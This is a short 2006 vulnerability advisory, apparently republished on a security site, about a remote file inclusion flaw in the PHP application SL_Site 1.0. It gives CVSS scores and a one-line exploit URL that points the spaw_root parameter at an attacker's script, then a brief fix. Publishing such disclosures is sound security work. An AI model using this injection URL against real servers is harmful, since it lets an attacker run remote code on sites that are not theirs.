SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

2006.09.12
Credit: Kw3rLn
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------ --- SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability ------------------------------------------------------------------------ --- Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net : Remote : Yes Critical Level : Dangerous ------------------------------------------------------------------------ --- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : SL_Site version : 1.0 URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip ------------------------------------------------------------------ Exploit: ~~~~~~ Variable $spaw_root not sanitized.When register_globals=on an attacker ca n exploit this vulnerability with a simple php injection script. # http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[E vil_Script] ------------------------------------------------------------------------ --- Solution : ~~~~~~~~ declare variabel $spaw_root ------------------------------------------------------------------------ --- Shoutz: ~~~~ # Special greetz to my good friend [Oo] # To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ] ------------------------------------------------------------------------ --- */ Contact: ~~~~~~ Nick: Kw3rLn E-mail: ciriboflacs[at]YaHoo[dot]Com Homepage: hTTp://RST-CREW.NET _/* -------------------------------- [ EOF] ----------------------------------


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top